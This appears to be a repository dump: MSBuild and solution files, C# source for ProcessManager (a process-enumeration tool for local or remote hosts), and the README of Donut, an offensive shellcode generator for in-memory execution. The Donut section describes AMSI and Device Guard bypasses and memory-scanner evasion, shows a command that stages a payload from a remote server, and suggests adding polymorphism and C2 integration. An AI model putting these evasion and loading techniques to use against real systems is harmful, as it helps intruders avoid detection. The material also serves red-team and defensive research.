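Review bot: Two of the `<Reference>` items, `<Reference Include="Microsoft.CSharp" />` and `<Reference Include="System.Net.Http" />`, name assemblies that do not exist in the .NET Framework 3.5 reference set this project selects with `<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>` (Microsoft.CSharp ships with 4.0, System.Net.Http with 4.5), so MSBuild will warn about unresolved references on every build and a clean-room rebuild of the tool is noisier than it needs to be. As far as the visible Program.cs goes, neither assembly is used, so this looks like leftover from a 4.x project template that was retargeted; the likely fix is to delete those two lines, or raise TargetFrameworkVersion if 4.x is actually intended. `System.Data.DataSetExtensions` and `System.Management` also appear unused in the visible code, though Program.cs runs past this view so I cannot be certain for them.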
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|AnyCPU'">
3 <StartArguments>
4 </StartArguments>
5 </PropertyGroup>
6 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
7 <StartArguments>
8 </StartArguments>
9 </PropertyGroup>
10 </Project>
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "ProcessManager.csproj", "{98CA74C7-A074-434D-9772-75896E73CEAA}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {EA625DA1-2E6D-4092-B504-DEE5CD2E9F43}
23 EndGlobalSection
24 EndGlobal
0 /** Name: ProcessManager
1 * Author: TheWover
2 * Description: Displays useful information about processes running on a local or remote machine.
3 *
4 * Last Modified: 04/13/2018
5 *
6 */
7
8 using System;
9 using System.Linq;
10 using System.Diagnostics;
11 using System.Runtime.InteropServices;
12 using System.ComponentModel;
13 using System.Security.Principal;
14
15 namespace ProcessManager
16 {
17
18 class Program
19 {
20 private struct Arguments
21 {
22 public string processname;
23 public string machinename;
24 public bool help;
25 }
26
27 static void Main(string[] args)
28 {
29 //Parse command-line arguments
30 Arguments arguments = ParseArgs(args);
31
32 if (args.Length > 0)
33 {
34 if (arguments.help == true)
35 {
36 PrintUsage();
37 Environment.Exit(0);
38 }
39
40 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity", "User");
41
42 //If the user specifed that a different machine should be used, then parse for the machine name and run the command.
43 if (arguments.machinename != null)
44 {
45 try
46 {
47 if (arguments.processname != null)
48
49 //Enumerate the processes
50 DescribeProcesses(Process.GetProcessesByName(arguments.processname, arguments.machinename));
51 else
52
53 //Enumerate the processes
54 DescribeProcesses(Process.GetProcesses(arguments.machinename));
55 }
56 catch
57 {
58 Console.WriteLine("Error: Invalid machine name.");
59
60 Environment.Exit(1);
61 }
62 }
63 else
64 {
65 if (arguments.processname != null)
66 //Enumerate the processes
67 DescribeProcesses(Process.GetProcessesByName(arguments.processname));
68 else
69 //Enumerate the processes
70 DescribeProcesses(Process.GetProcesses());
71 }
72
73 }
74 else
75 {
76 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity" , "User");
77
78 DescribeProcesses(Process.GetProcesses());
79 }
80 }
81
82 private static Arguments ParseArgs(string[] args)
83 {
84 Arguments arguments = new Arguments();
85 arguments.help = false;
86 arguments.machinename = null;
87 arguments.processname = null;
88
89 if (args.Length > 0)
90 {
91 if (args.Contains("--help") || args.Contains("-h"))
92 {
93 arguments.help = true;
94 }
95 }
96
97 //Filter by process name
98 if (args.Contains("--name") && args.Length >= 2)
99 {
100 //The number of the command line argument that specifies the process name
101 int nameindex = new System.Collections.Generic.List<string>(args).IndexOf("--name") + 1;
102
103 arguments.processname = args[nameindex];
104 }
105
106 //If the user specifed that a different machine should be used, then parse for the machine name and run the command.
107 if (args.Contains("--machine") && args.Length >= 2)
108 {
109 try
110 {
111 //The number of the command line argument that specifies the machine name
112 int machineindex = new System.Collections.Generic.List<string>(args).IndexOf("--machine") + 1;
113
114 arguments.machinename = args[machineindex];
115 }
116 catch
117 {
118 Console.WriteLine("Error: Invalid machine name.");
119
120 Environment.Exit(1);
121 }
122
123 }
124
125 return arguments;
126 }
127
128 private static void PrintUsage()
129 {
130 Console.WriteLine();
131 Console.WriteLine("| Process Manager [v0.2]");
132 Console.WriteLine("| Copyright (c) 2019 TheWover");
133 Console.WriteLine();
134
135 Console.WriteLine("Usage: ProcessManager.exe [machine]");
136 Console.WriteLine();
137
138 Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
139 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--machine", "Specify a machine to query. Machine name or IP Address may be used.");
140 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--name", "Filter by a process name.");
141 Console.WriteLine();
142
143 Console.WriteLine("Examples:");
144 Console.WriteLine();
145
146 Console.WriteLine("ProcessManager.exe");
147 Console.WriteLine("ProcessManager.exe --name svchost");
148 Console.WriteLine("ProcessManager.exe --machine workstation2");
149 Console.WriteLine("ProcessManager.exe --machine 10.30.134.13");
150 Console.WriteLine();
151 }
152
153 private static void DescribeProcesses(Process[] processes)
154 {
155
156 //Sort in ascending order by PID
157 processes = processes.OrderBy(p => p.Id).ToArray();
158
159 foreach (Process process in processes)
160 {
161 //Get the PID
162 ProcessDetails details = new ProcessDetails();
163 details.name = process.ProcessName;
164 details.pid = process.Id;
165
166 try
167 {
168 //Get the PPID
169 Process parent = ParentProcessUtilities.GetParentProcess(process.Id);
170 if (parent != null)
171 details.ppid = parent.Id;
172 else
173 details.ppid = -1;
174 }
175 //Parent is no longer running
176 catch (InvalidOperationException)
177 {
178 details.ppid = -1;
179 }
180
181
182 //Check the architecture
183 try
184 {
185 if (ProcessInspector.IsWow64Process(process))
186 details.arch = "x86";
187 else
188 details.arch = "x64";
189 }
190 catch
191 {
192 details.arch = "*";
193 }
194
195 try
196 {
197 //Determine whether or not the process is managed (has the CLR loaded).
198 details.managed = ProcessInspector.IsCLRLoaded(process);
199 }
200 //Process is no longer running
201 catch (InvalidOperationException)
202 {
203 details.managed = false;
204 }
205
206
207 try
208 {
209 //Gets the Session of the Process
210 details.session = process.SessionId;
211 }
212 //Process is no longer running
213 catch (InvalidOperationException)
214 {
215 details.session = -1;
216 }
217
218
219 try
220 {
221 //Gets the Integrity Level of the process
222 details.integrity = TokenInspector.GetIntegrityLevel(process);
223 }
224 //Process is no longer running
225 catch (InvalidOperationException)
226 {
227 details.integrity = TokenInspector.IntegrityLevel.Unknown;
228 }
229
230
231 try
232 {
233 //Gets the User of the Process
234 details.user = ProcessInspector.GetProcessUser(process);
235 }
236 //Process is no longer running
237 catch (InvalidOperationException)
238 {
239 details.user = "";
240 }
241
242 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", details.name, details.pid, details.ppid, details.arch, details.managed, details.session, details.integrity, details.user);
243 }
244 }
245 }
246
247 public struct ProcessDetails
248 {
249 public string name;
250 public int pid;
251 public int ppid;
252 public string arch;
253 public bool managed;
254 public int session;
255 public TokenInspector.IntegrityLevel integrity;
256 public string user;
257 }
258
259 public static class ProcessInspector
260 {
261
262 [System.Runtime.InteropServices.DllImport("kernel32.dll")]
263 public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
264
265 [DllImport("ntdll.dll")]
266 private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
267
268 [DllImport("advapi32.dll", SetLastError = true)]
269 private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
270 [DllImport("kernel32.dll", SetLastError = true)]
271 [return: MarshalAs(UnmanagedType.Bool)]
272 private static extern bool CloseHandle(IntPtr hObject);
273
274 /// <summary>
275 /// Gets the parent process of a specified process.
276 /// </summary>
277 /// <returns>A Process object representing the parent.</returns>
278 public static Process GetParentProcess(Process process)
279 {
280 return ParentProcessUtilities.GetParentProcess(process.Id);
281 }
282
283 /// <summary>
284 /// Gets the parent process of a specified process.
285 /// </summary>
286 /// <returns>A Process object representing the parent.</returns>
287 public static Process GetParentProcess()
288 {
289 return GetParentProcess(Process.GetCurrentProcess());
290 }
291
292 /// <summary>
293 /// Checks whether the process is 64-bit.
294 /// </summary>
295 /// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
296 public static bool IsWow64Process(Process process)
297 {
298 bool retVal = false;
299 IsWow64Process(process.Handle, out retVal);
300 return retVal;
301 }
302
303 /// <summary>
304 /// Checks whether the process is 64-bit.
305 /// </summary>
306 /// <returns>Returns false if process is 64-bit, and true if process is 32-bit. Refer to MSDN for further details.</returns>
307 public static bool IsWow64Process()
308 {
309 bool retVal = false;
310 IsWow64Process(Process.GetCurrentProcess().Handle, out retVal);
311 return retVal;
312 }
313
314 /// <summary>
315 /// Checks if the CLR has been loaded into the specified process by
316 /// looking for loaded modules that contain "mscor" in the name.
317 /// </summary>
318 /// <param name="process">The process to check.</param>
319 /// <returns>True if the CLR has been loaded. False if it has not.</returns>
320 public static bool IsCLRLoaded(Process process)
321 {
322 try
323 {
324 var modules = from module in process.Modules.OfType<ProcessModule>()
325 select module;
326
327 return modules.Any(pm => pm.ModuleName.Contains("mscor"));
328 }
329 //Access was denied
330 catch (Win32Exception)
331 {
332 return false;
333 }
334 //Process has already exited
335 catch (InvalidOperationException)
336 {
337 return false;
338 }
339
340 }
341
342 /// <summary>
343 /// Gets the owner of a process.
344 ///
345 /// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
346 /// </summary>
347 /// <param name="process">The process to inspect.</param>
348 /// <returns>The name of the user, or null if it could not be read.</returns>
349 public static string GetProcessUser(Process process)
350 {
351 IntPtr processHandle = IntPtr.Zero;
352 try
353 {
354 OpenProcessToken(process.Handle, 8, out processHandle);
355 WindowsIdentity wi = new WindowsIdentity(processHandle);
356 return wi.Name;
357 }
358 catch
359 {
360 return null;
361 }
362 finally
363 {
364 if (processHandle != IntPtr.Zero)
365 {
366 CloseHandle(processHandle);
367 }
368 }
369 }
370
371 }//end class
372
373 /// <summary>
374 /// A utility class to determine a process parent.
375 /// </summary>
376 [StructLayout(LayoutKind.Sequential)]
377 public struct ParentProcessUtilities
378 {
379 // These members must match PROCESS_BASIC_INFORMATION
380 internal IntPtr Reserved1;
381 internal IntPtr PebBaseAddress;
382 internal IntPtr Reserved2_0;
383 internal IntPtr Reserved2_1;
384 internal IntPtr UniqueProcessId;
385 internal IntPtr InheritedFromUniqueProcessId;
386
387 [DllImport("ntdll.dll")]
388 private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
389
390 /// <summary>
391 /// Gets the parent process of the current process.
392 /// </summary>
393 /// <returns>An instance of the Process class.</returns>
394 public static Process GetParentProcess()
395 {
396 return GetParentProcess(Process.GetCurrentProcess().Handle);
397 }
398
399 /// <summary>
400 /// Gets the parent process of specified process.
401 /// </summary>
402 /// <param name="id">The process id.</param>
403 /// <returns>An instance of the Process class.</returns>
404 public static Process GetParentProcess(int id)
405 {
406 try
407 {
408 Process process = Process.GetProcessById(id);
409
410 GetParentProcess(process.Handle);
411
412 return GetParentProcess(process.Handle);
413 }
414 //Access was denied, or
415 catch
416 {
417 return null;
418 }
419 }
420
421 /// <summary>
422 /// Gets the parent process of a specified process.
423 /// </summary>
424 /// <param name="handle">The process handle.</param>
425 /// <returns>An instance of the Process class.</returns>
426 public static Process GetParentProcess(IntPtr handle)
427 {
428 ParentProcessUtilities pbi = new ParentProcessUtilities();
429 int returnLength;
430 int status = NtQueryInformationProcess(handle, 0, ref pbi, Marshal.SizeOf(pbi), out returnLength);
431 if (status != 0)
432 throw new Win32Exception(status);
433
434 try
435 {
436 return Process.GetProcessById(pbi.InheritedFromUniqueProcessId.ToInt32());
437 }
438 catch (ArgumentException)
439 {
440 // not found
441 return null;
442 }
443 }
444 }
445
446 /// <summary>
447 /// Inspects the tokens of an arbitrary Process and reports useful information.
448 ///
449 /// This class is almost entirely copied from the example provided by pinvoke.net:
450 /// http://pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
451 /// </summary>
452 public class TokenInspector
453 {
454 [DllImport("advapi32.dll", SetLastError = true)]
455 static extern IntPtr GetSidSubAuthority(IntPtr sid, UInt32 subAuthorityIndex);
456
457 [DllImport("advapi32.dll", SetLastError = true)]
458 static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
459
460 // winnt.h, Windows SDK v6.1
461 const int SECURITY_MANDATORY_UNTRUSTED_RID = (0x00000000);
462 const int SECURITY_MANDATORY_LOW_RID = (0x00001000);
463 const int SECURITY_MANDATORY_MEDIUM_RID = (0x00002000);
464 const int SECURITY_MANDATORY_HIGH_RID = (0x00003000);
465 const int SECURITY_MANDATORY_SYSTEM_RID = (0x00004000);
466 const int SECURITY_MANDATORY_PROTECTED_PROCESS_RID = (0x00005000);
467
468 [DllImport("advapi32.dll", SetLastError = true)]
469 [return: MarshalAs(UnmanagedType.Bool)]
470 static extern bool OpenProcessToken(
471 IntPtr ProcessHandle,
472 UInt32 DesiredAccess,
473 out IntPtr TokenHandle
474 );
475
476 const UInt32 TOKEN_QUERY = 0x0008;
477
478 [DllImport("advapi32.dll", SetLastError = true)]
479 static extern bool GetTokenInformation(
480 IntPtr TokenHandle,
481 TOKEN_INFORMATION_CLASS TokenInformationClass,
482 IntPtr TokenInformation,
483 uint TokenInformationLength,
484 out uint ReturnLength
485 );
486
487 enum TOKEN_INFORMATION_CLASS
488 {
489 TokenUser = 1, TokenGroups, TokenPrivileges, TokenOwner, TokenPrimaryGroup, TokenDefaultDacl, TokenSource, TokenType, TokenImpersonationLevel, TokenStatistics, TokenRestrictedSids, TokenSessionId, TokenGroupsAndPrivileges, TokenSessionReference, TokenSandBoxInert, TokenAuditPolicy, TokenOrigin, TokenElevationType, TokenLinkedToken, TokenElevation, TokenHasRestrictions, TokenAccessInformation, TokenVirtualizationAllowed, TokenVirtualizationEnabled,
490
491 /// <summary>
492 /// The buffer receives a TOKEN_MANDATORY_LABEL structure that specifies the token's integrity level.
493 /// </summary>
494 TokenIntegrityLevel,
495
496 TokenUIAccess, TokenMandatoryPolicy, TokenLogonSid, MaxTokenInfoClass
497 }
498
499 public enum IntegrityLevel
500 {
501 Low, Medium, High, System, None, Unknown
502 }
503
504 const int ERROR_INVALID_PARAMETER = 87;
505
506 [DllImport("kernel32.dll", SetLastError = true)]
507 static extern bool CloseHandle(IntPtr hHandle);
508
509
510 public static IntegrityLevel GetIntegrityLevel(Process process)
511 {
512 try
513 {
514 IntPtr pId = (process.Handle);
515
516 IntPtr hToken = IntPtr.Zero;
517 if (OpenProcessToken(pId, TOKEN_QUERY, out hToken))
518 {
519 try
520 {
521 IntPtr pb = Marshal.AllocCoTaskMem(1000);
522 try
523 {
524 uint cb = 1000;
525 if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
526 {
527 IntPtr pSid = Marshal.ReadIntPtr(pb);
528
529 int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));
530
531 if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
532 {
533 return IntegrityLevel.Low;
534 }
535 else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
536 {
537 // Medium Integrity
538 return IntegrityLevel.Medium;
539 }
540 else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
541 {
542 // High Integrity
543 return IntegrityLevel.High;
544 }
545 else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
546 {
547 // System Integrity
548 return IntegrityLevel.System;
549 }
550 return IntegrityLevel.None;
551 }
552 else
553 {
554 return IntegrityLevel.Unknown;
555 }
556 }
557 finally
558 {
559 Marshal.FreeCoTaskMem(pb);
560 }
561 }
562 finally
563 {
564 CloseHandle(hToken);
565
566 }
567 }
568 }
569 catch (Win32Exception ex)
570 {
571 return IntegrityLevel.Unknown;
572 }
573
574 //If we made it this far through all of the finally blocks and didn't return, then return unknown
575 return IntegrityLevel.Unknown;
576 }
577 }
578 }
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("ProcessManager")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("ProcessManager")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("98ca74c7-a074-434d-9772-75896e73ceaa")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
0 # ProcessManager
1
2 Has its own repo at: https://github.com/TheWover/ProcessManager
3
4 ps-like .NET Assembly for enumerating processes on the current machine or a remote machine (using current token). Has the unique feature of telling you whether each process is managed (has the CLR loaded). Compatible with .NET v3.5.
5
6 All enumeration is done with only built-in .NET APIs and PInvoke, rather than any third-party libraries or usage of WMI.
7
8 * PPID value of "-1" means that the parent is no longer running or is not accessible.
9 * Arch value of "*" means that the process could not be accessed or the architecture could not be determined. Usually a permissions issue.
10 * Managed value of "True" means that the CLR is loaded into the process. That is, it is a "managed" process because it is running .NET managed code.
11 * Integrity value of "Unknown" means exactly that.
12 * Blank User value means that the user information of the process could not be obtained.
13
14 **I have not tested ProcessManager's remote enumeration option. :-P Neither me nor Odzhan have a lab setup for testing that. Please feel free to let us know of any issues.**
15
16 ![Alt text](https://github.com/TheWover/ProcessManager/blob/master/img/usage.JPG?raw=true "General Usage")
17
18 # Usage
19
20 ```
21 | Process Manager [v0.2]
22 | Copyright (c) 2019 TheWover
23
24 Usage: ProcessManager.exe [options]
25
26 -h, --help Display this help menu.
27 --machine Specify a machine to query. Machine name or IP Address may be used.
28 --name Filter by a process name.
29
30 Examples:
31
32 ProcessManager.exe
33 ProcessManager.exe --name svchost
34 ProcessManager.exe --machine workstation2
35 ProcessManager.exe --machine 10.30.134.13
36 ```
0 # Using Donut
1
2 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
3
4 Version: 0.9.2 *please submit issues and requests for v1.0 release*
5
6 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
7
8 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
9
10 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
11
12 ## Introduction
13
14 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
15
16 It can be used in several ways.
17
18 ## As a Standalone Tool
19
20 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
21
22 ```
23
24 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
25
26 -MODULE OPTIONS-
27
28 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
29 -u <URL> HTTP server that will host the donut module.
30
31 -PIC/SHELLCODE OPTIONS-
32
33 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
34 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
35 -o <payload> Output file. Default is "payload.bin"
36
37 -DOTNET OPTIONS-
38
39 -c <namespace.class> Optional class name. (required for .NET DLL)
40 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
41 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
42 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
43 -d <name> AppDomain name to create for .NET. Randomly generated by default.
44
45 examples:
46
47 donut -f c2.dll
48 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
49 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
50
51 ```
52
53 ### Building Donut
54
55 Tags have been provided for each release version of donut that contain the compiled executables.
56
57 * v0.9.2, Bear Claw:
58 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
59 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
60 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
61
62 However, you may also clone and build the source yourself using the provided makefiles.
63
64 ## Building From Repository
65
66 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
67
68 ```
69 git clone http://github.com/thewover/donut
70 cd donut
71 ```
72
73 ## Linux
74
75 Simply run make to generate an executable, static and dynamic libraries.
76
77 ```
78 make
79 make clean
80 make debug
81 ```
82
83 ## Windows
84
85 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
86
87 ```
88 nmake -f Makefile.msvc
89 nmake clean -f Makefile.msvc
90 nmake debug -f Makefile.msvc
91 ```
92
93 ## As a Library
94
95 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
96
97 ## As a Python Module
98
99 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
100
101 ```
102 pip install .
103 ```
104
105 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
106
107 ```
108 pip install donut-shellcode
109 ```
110
111 ## As a Template - Rebuilding the shellcode
112
113 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
114
115 ### Microsoft Visual Studio
116
117 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
118
119 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
120
121 ```
122 nmake clean -f Makefile.msvc
123 nmake -f Makefile.msvc
124 ```
125
126 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
127
128 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
129
130 ```
131 nmake clean -f Makefile.msvc
132 nmake x86 -f Makefile.msvc
133 ```
134
135 This will save the shellcode as a C array to *payload_exe_x86.h*.
136
137 ### Mingw-w64
138
139 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
140
141 ```
142 make clean -f Makefile.mingw
143 make -f Makefile.mingw
144 ```
145
146 Once you've recompiled for all architectures, you may rebuild donut.
147
148 ## Bypasses
149
150 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
151
152 * AMSI in .NET v4.8
153 * Device Guard policy preventing dynamicly generated code from executing
154
155 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
156
157 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
158
159 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
160
161 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
162
163 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
164
165 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
166
167 ### Additional features.
168
169 These are left as exercises to the reader. I would personally recommend:
170
171 * Add environmental keying
172 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
173 * Integrate donut as a module into your favorite RAT/C2 Framework
174
175 ## Disclaimers
176
177 * No, we will not update donut to counter signatures or detections by any AV.
178 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
179
180 # How it works
181
182 ## Procedure for Assemblies
183
184 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
185
186 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
187
188 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
189
190 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
191
192 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
193
194 ## Procedure for ActiveScript/XSL
195
196 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
197
198 ## Procedure for PE Loading
199
200 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
201
202 ## Components
203
204 Donut contains the following elements:
205
206 * donut.c: The source code for the donut payload generator
207 * donut.exe: The compiled payload generator as an EXE
208 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
209 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
210 * setup.py: The setup file for installing Donut as a Pip Python3 module.
211 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
212 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
213 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
214 * payload/payload.c: Main file for the shellcode.
215 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
216 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
217 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
